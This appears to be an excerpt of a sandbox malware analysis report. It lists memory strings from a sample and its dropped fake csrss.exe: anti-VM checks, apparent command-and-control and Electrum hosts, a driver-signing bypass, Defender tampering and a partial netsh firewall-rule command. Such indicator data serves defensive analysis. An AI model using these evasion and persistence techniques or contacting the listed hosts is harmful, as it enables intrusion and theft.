Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp Binary or memory string: VersionVirtualWSARecvWSASend"%s" %stypes value=abortedalt -> ancientany -> booleancharsetchunkedcmd.execonnectconsolecpu: %scrimsonderivedexpiresfallingfeatherfireflyfloat32float64gctraceglitterhttp://id is 0invalidkdu.exelookup max-agemorningnil keynop -> number panic: patientrefererrefreshrunningserial:server=signal silencesvc_versyscallthundertraileruintptrunknownupgradeversionvmmousevpcuhubwaitingwsarecvwsasendwup_verxen: %wxennet6 data=%q etypes goal
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327647157.00000000160E2000.00000004.00000001.sdmp Binary or memory string: vmsrvc.exe
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327647157.00000000160E2000.00000004.00000001.sdmp Binary or memory string: xennetxennet6XA
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp Binary or memory string: Value is nullVirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dllauthorizationbad flushGen bad map statebtc.cihar.combtc.xskyx.netcache-controlcontent-rangecouldn't polldalTLDpSugct?data is emptyemail addressempty integerexchange fullfatal error: gethostbynamegetservbynamegzip, deflatehttp2client=0if-none-matchimage/svg+xmlinvalid UTF-8invalid base kernel32.dllkey expansionlast-modifiedlevel 3 resetload64 failedlogs endpointmaster secretname is emptynil stackbasenot a Float32open file: %wout of memoryparallels: %wparse URL: %wparsing time powrprof.dllprl_tools.exerebooting nowscvg: inuse: servers countservice statesigner is nilsocks connectsrmount errorstill in listtimer expiredtrailing datatriggerRatio=unimplementedunsupported: user canceledvalue method verifier hashverifier hostvirtualpc: %wxadd64 failedxchg64 failed}
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327007315.000000001600E000.00000004.00000001.sdmp Binary or memory string: vboxservice.exe
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp Binary or memory string: (MISSING)(unknown)+infinity, newval=, oldval=-07:00:00-infinity/api/cdn?/api/poll244140625: status=; Domain=Accuracy(AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticExecQueryFindCloseForbiddenGetDIBitsHex_DigitInheritedInstMatchInstRune1InterfaceKhudawadiLocalFreeMalayalamMongolianMoveFileWNabataeanNot FoundOP_RETURNOSCaptionPalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:][:alpha:][:ascii:][:blank:][:cntrl:][:digit:][:graph:][:lower:][:print:][:punct:][:space:][:upper:]atomicor8b.ooze.ccbad indirbillowingbroadcastbus errorbutterflychallengechan sendcomplex64connectexcopystackcsrss.exectxt != 0d.nx != 0ecdsa.netempty urlfn.48.orgfodhelperfork/execfuncargs(gdi32.dllimage/gifimage/pnginterfaceinterruptipv6-icmplingeringlocalhostmSpanDeadmSpanFreemulticastnew tokennil errorntdll.dllole32.dllomitemptypanicwaitpatch.exepclmulqdqprecisionprintableprotocol psapi.dllraw-writereboot inrecover: reflect: resonancerwxrwxrwxscheduledsnowflakesparklingsucceededtask %+v
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp Binary or memory string: throbbingunderflowunhandledw3m/0.5.1wanderingwaterfallweatheredwebsocketxenevtchn} stack=[ MB goal, actual
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327007315.000000001600E000.00000004.00000001.sdmp Binary or memory string: vboxtray.exe
Source: csrss.exe Binary or memory string: tUsage of %s: Value is nullVirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327530754.00000000160B4000.00000004.00000001.sdmp Binary or memory string: vboxtray.exevboxservice.exesmss.exevboxtray.exevboxservice.execsrss.exevboxtray.exevboxservice.exewininit.exevboxtray.exevboxservice.execsrss.exevboxtray.exevboxservice.exewinlogon.exevboxtray.exevboxservice.exeservices.exevboxtray.exevboxservice.exelsass.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exedwm.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exeHxTsr.exehxtsr.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exedllhost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exeWmiPrvSE.exewmiprvse.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exeWmiPrvSE.exewmiprvse.exevboxtray.exevboxservice.exeWmiPrvSE.exewmiprvse.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exevboxtray.
exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.execonhost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exeUsoClient.exeusoclient.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exedllhost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesv
Source: 4t4y4r89UZ.exe, 00000000.00000003.284065740.00000000058F0000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp Binary or memory string: unknown network workbuf is emptywww-authenticate initialHeapLive= spinningthreads=%%!%c(big.Int=%s)0123456789ABCDEFX0123456789abcdefx060102150405Z07001192092895507812559604644775390625: missing method ; SameSite=StrictAdjustTokenGroupsCOMPRESSION_ERRORCanSet() is falseCertFindExtensionCreateStdDispatchCryptDecodeObjectDnsRecordListFreeENHANCE_YOUR_CALMEnumThreadWindowsFLE Standard TimeFailed DependencyGC assist markingGMT Standard TimeGTB Standard TimeGetCurrentProcessGetShortPathNameWHEADER_TABLE_SIZEHKEY_CLASSES_ROOTHKEY_CURRENT_USERHTTP_1_1_REQUIREDIf-Modified-SinceIsTokenRestrictedLookupAccountSidWMoved PermanentlyOld_North_ArabianOld_South_ArabianOther_ID_ContinuePython-urllib/2.5ReadProcessMemoryRegLoadMUIStringWSafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenToo Many RequestsTransfer-EncodingUnified_IdeographVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDNbad TinySizeClasscouldn't dial: %wcouldn't find pidcouldn't get UUIDcouldn't get pidscouldn't hide PIDcouldn't registercpu name is emptydecryption faileddiscover-electrumelectrumx.soon.itembedded/%s32.sysembedded/%s64.sysenode.duckdns.orgentersyscallblockerbium1.sytes.netexec format errorexec: not startedexponent overflowfile URL is emptyfractional secondgp.waiting != nilhandshake failureif-modified-sinceillegal parameterimpersonation: %win string literalindex > windowEndinteger too largeinvalid bit size 
invalid stream IDkey align too biglibwww-perl/5.820locked m0 woke upmark - bad statusmarkBits overflowmissing closing )missing closing ]missing extensionnil resource bodyno data availablenotetsleepg on g0permission deniedpseudo-device: %sread revision: %wrecords are emptyreflect.Value.Capreflect.Value.Intreflect.Value.Lenreflect: New(nil)reflect: call of runtime.newosprocruntime: a.base= runtime: b.base= runtime: nameOff runtime: next_gc=runtime: pointer runtime: textOff runtime: typeOff scanobject n == 0seek at 0x%0x: %wseeker can't seekselect (no cases)stack: frame={sp:thread exhaustiontransfer-encodingtruncated headersunknown caller pcwait for GC cyclewine_get_version
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327572896.00000000160C4000.00000004.00000001.sdmp Binary or memory string: Microsoft Windows 10 ProHKEY_USERS\ardz\Desktop\4t4y4r89UZ.exe" "C:\Users\user\Desktop\4t4y4r89UZ.exe" S-1-5-21-3853321935-2125563209-4053062332-1002RoughSnowFirstInstallDateIntel(R) Core(TM)2 CPU 6600 @ 2.40 GHzc:\users\user\desktop\4t4y4r89uz.exeintel(r) core(tm)2 cpu 6600 @ 2.40 ghzcsrss.exewininit.execsrss.exewinlogon.exeservices.exelsass.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exeHxTsr.exedllhost.exesvchost.exeWmiPrvSE.exeWmiPrvSE.exeWmiPrvSE.exesvchost.exesvchost.exesvchost.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.execonhost.exesvchost.exesvchost.exedllhost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exe\\.\VBoxMiniRdrDN\\.\pipe\VBoxMiniRdDN\\.\pipe\VBoxTrayIPCcsrss.exewininit.execsrss.exewinlogon.exeservices.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exespoolsv.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exectfmon.exeexplorer.exesv
chost.exedllhost.exeSearchUI.exesvchost.exeHxTsr.exedllhost.exesvchost.exeWmiPrvSE.exeWmiPrvSE.exeWmiPrvSE.exesvchost.exesvchost.exesvchost.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.exeWTxHDpAvIGBPfMKNXDutRTewWv.execonhost.exesvchost.exesvchost.exedllhost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exeMicrosoft Windows 10 ProC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrssaa3f8HKEY_USERS\S-
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp Binary or memory string: , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCANCELCarianChakmaClass(CommonCookieCopticDELETEExpectFltMgrFormatFridayGOAWAYGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLockedLycianLydianMondayPADDEDPcaSvcPragmaProgidRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFVT(%d)WINDIRWinMonWinmon[]byte\??\%s\csrss\ufffd
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327530754.00000000160B4000.00000004.00000001.sdmp Binary or memory string: vmhgfs$
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327559047.00000000160BC000.00000004.00000001.sdmp Binary or memory string: ?advapi32.dllRegQueryValueExWFirewallDefenderhttps://trumops.comhttps://retoti.comServiceVersionServersVersionDistributorIDCampaignIDOSCaptionMicrosoft Windows 10 ProOSArchitecturePatchTime3LFU_3R1OpenProcessTokenGetTokenInformationS-1-5-18c:\windows\rss\csrss.exeCreateToolhelp32Snapshot[System Process]SystemRegistrysmss.exefontdrvhost.exefontdrvhost.exedwm.exeMemory Compressionmemory compressionsmartscreen.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeSystemSettingsBroker.exesystemsettingsbroker.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exebackgroundTaskHost.exebackgroundtaskhost.exeRuntimeBroker.exeruntimebroker.exebackgroundTaskHost.exebackgroundtaskhost.exebackgroundTaskHost.exebackgroundtaskhost.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeSgrmBroker.exeTrustedInstaller.exetrustedinstaller.exe4t4y4r89UZ.exeVBoxWddmCloseServiceHandleVBoxMouseVBoxGuestVBoxService\\.\VBoxGuest\\.\VBoxTrayIPC[System 
Process]vgauthservice.exeSystemvgauthservice.exeRegistryvgauthservice.exesmss.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exeShellExperienceHost.exeshellexperiencehost.exevgauthservice.exevgauthservice.exeRuntimeBroker.exeruntimebroker.exevgauthservice.exesmartscreen.exevgauthservice.exeRuntimeBroker.exeruntimebroker.exevgauthservice.exevgauthservice.exevgauthservice.exeRuntimeBroker.exeruntimebroker.exevgauthservice.exeRuntimeBroker.exeruntimebroker.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exeSystemSettingsBroker.exesystemsettingsbroker.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exewtxhdpavigbpfmknxdutrtewwv.exevgauthservice.exewtxhdpavigbpfmknxdutrtewwv.exevgauthservice.exewtxhdpavigbpfmknxdutrtewwv.exevgauthservice.exewtxhdpavigbpfmknxdutrtewwv.exevgauthservice.exewtxhdpavigbpfmk
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327007315.000000001600E000.00000004.00000001.sdmp Binary or memory string: sharedintapp.exesmss.exesharedintapp.execsrss.exesharedintapp.exewininit.exesharedintapp.execsrss.exesharedintapp.exewinlogon.exesharedintapp.exeservices.exesharedintapp.exelsass.exesharedintapp.exesvchost.exesharedintapp.exesharedintapp.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exedwm.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exespoolsv.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesihost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exectfmon.exesharedintapp.exeexplorer.exesharedintapp.exesvchost.exesharedintapp.exedllhost.exesharedintapp.exesharedintapp.exeSearchUI.exesearchui.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesvchost.exesharedintapp.exeHxTsr.exehxtsr.exesharedintapp.exesharedintapp.exesharedintapp.exedllhost.exesharedintapp.exesvchost.exesharedintapp.exeWmiPrvSE.exewmiprvse.exesharedintapp.exesharedintapp.exeWmiPrvSE.exe
wmiprvse.exesharedintapp.exeWmiPrvSE.exewmiprvse.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.execonhost.exesharedintapp.exesvchost.exesharedintapp.exeUsoClient.exeusoclient.exesharedintapp.exesharedintapp.exesvchost.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exedllhost.exesharedintapp.exesharedintapp.exesvchost.exesharedintapp.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesgrmbroker.exesharedintapp.exesvchost.exesharedintapp.exesharedintapp.exe4t4y4r89uz.exesharedintapp.exe[system process]vmsrvc.exevmusrvc.exeSystemsystemvmsrvc.exevmusrvc.exeRegistryregistry
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327530754.00000000160B4000.00000004.00000001.sdmp Binary or memory string: [system process]vboxtray.exe
Source: csrss.exe Binary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTESTING KEYTTL expiredVBoxServiceVMUSrvc.exeVT_RESERVEDVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exealarm clockapplicationbad addressbad message
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327007315.000000001600E000.00000004.00000001.sdmp Binary or memory string: vmxnetvmx86$
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327007315.000000001600E000.00000004.00000001.sdmp Binary or memory string: systemvmsrvc.exe
Source: csrss.exe Binary or memory string: ikiPRIORITYParseIntPersoconPhags_PaQuestionReadFileReceivedSETTINGSSHA1-RSASaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUgariticVBoxWddmVT_ARRAYVT_BYREFWSAIoctlWinmonFS[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnumacceptexa
Source: 4t4y4r89UZ.exe, 00000000.00000003.284065740.00000000058F0000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp Binary or memory string: ><'\'') = ) m=+Inf+inf, n -Inf-inf.bat.cmd.com.css.exe.gif.htm.jpg.mjs.pdf.png.svg.sys.xml0.100x%x108020063125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCDN=CESTChamDATADashDateEESTEtagFromGOGCGoneHEADHKCCHKLMHostJulyJuneLisuMiaoModiNZDTNZSTNameNewaPINGPOSTQEMUROOTSASTStatThaiUUIDWESTXeon"%s"\rss\smb\u00\wup
Source: 4t4y4r89UZ.exe, 00000000.00000003.284065740.00000000058F0000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp Binary or memory string: to unallocated span%%!%c(*big.Float=%s)%s\Sysnative\cmd.exe37252902984619140625Arabic Standard TimeAzores Standard TimeCertFindChainInStoreCertOpenSystemStoreWChangeServiceConfigWCheckTokenMembershipCreateProcessAsUserWCryptAcquireContextWDHT has wrong lengthDQT has wrong lengthDRI has wrong lengthEgyptian_HieroglyphsEnumProcessModulesExFileTimeToSystemTimeGetAcceptExSockaddrsGetAdaptersAddressesGetCurrentDirectoryWGetFileAttributesExWGetModuleFileNameExWGetModuleInformationGetProcessMemoryInfoGetWindowsDirectoryWIDS_Trinary_OperatorInsufficient StorageIsrael Standard TimeJordan Standard TimeMAX_HEADER_LIST_SIZEMalformed JSON errorMediapartners-GoogleMeroitic_HieroglyphsNtUnmapViewOfSectionNtWriteVirtualMemoryOffline Explorer/2.5ProcessIdToSessionIdQueryServiceConfig2WQueryServiceStatusExRegisterEventSourceWRequest URI Too LongRtlInitUnicodeStringSHGetKnownFolderPathSOF has wrong lengthSOS has wrong lengthSafeArrayDestroyDataSafeArrayGetElemsizeSeek: invalid offsetSeek: invalid whenceSetCurrentDirectoryWSetHandleInformationSetVolumeMountPointWTaipei Standard TimeTerminal_PunctuationTurkey Standard TimeUnprocessable EntityWinmonProcessMonitor[invalid char class]\\.\pipe\VBoxTrayIPCasn1: syntax error: bad defer size classbad font file formatbad system page sizebad use of bucket.bpbad use of bucket.mpchan send (nil chan)close of nil channelconnection error: %sconnection timed outcouldn't disable DSEcouldn't get IsAdmincouldn't get serverscouldn't run servicecouldn't set IsAdmincouldn't set serverscouldn't stop PsaSvccouldn't write patchelectrum.hsmiths.comelectrum.taborsky.czelectrum.villocq.comflag: help requestedfloating point errorforcegc: phase errorgc_trigger underflowgetadaptersaddressesgo of nil func valuegopark: bad g statusgzip: invalid headerheader line too longhttp2: stream closedinvalid repeat countinvalid request codeis a named type filejson: Unmarshal(nil json: Unmarshal(nil)key has been revokedmSpanList.insertBackmalformed ciphertextmalloc during signalmultiple SOF markersno such struct fieldnon-empty swept listnorm: invalid whencenot an integer classnotetsleep not on g0number has no digitsnumber of componentsp mcache not flushedpacer: assist ratio=pad length too largepreempt off reason: reflect.Value.SetIntreflect.makeFuncStubrequest file CDN: %wroot\SecurityCenter2runtime: casgstatus runtime: double waitruntime: unknown pc semaRoot rotateRightshort segment lengthsystemdrive is emptytime: invalid numbertrace: out of memoryunexpected network: unknown address typeuser is not an adminverifier host cachedwirep: already in goworkbuf is not emptywrite of Go pointer ws2_32.dll not foundzlib: invalid header gp.gcscanvalid=true
Source: csrss.exe Binary or memory string: time: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (default %q) (default %v) MB released MB) wo
Source: 4t4y4r89UZ.exe, 00000000.00000002.293844995.0000000004C28000.00000040.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.320126645.0000000004BB5000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.553003907.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000010.00000002.364381433.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000017.00000002.393120243.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000022.00000002.387543295.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000032.00000002.400160271.0000000005200000.00000040.00000001.sdmp Binary or memory string: ameNewaPINGPOSTQEMUROOTHIT!u
Source: 4t4y4r89UZ.exe, 00000000.00000003.284065740.00000000058F0000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp Binary or memory string: 100-continue152587890625762939453125Bidi_ControlCIDR addressCONTINUATIONCoCreateGuidCoInitializeContent TypeContent-TypeCookie.ValueCreateEventWCreateMutexWDeleteObjectECDSA-SHA256ECDSA-SHA384ECDSA-SHA512ErrUnknownPCFindNextFileGetAddrInfoWGetConsoleCPGetLastErrorGetLengthSidGetProcessIdGetStdHandleGetTempPathWGlobal\csrssI'm a teapotInstAltMatchJoin_ControlLittleEndianLoadLibraryWLoadResourceLockResourceMax-ForwardsMeetei_MayekMime-VersionMulti-StatusNot ExtendedNot 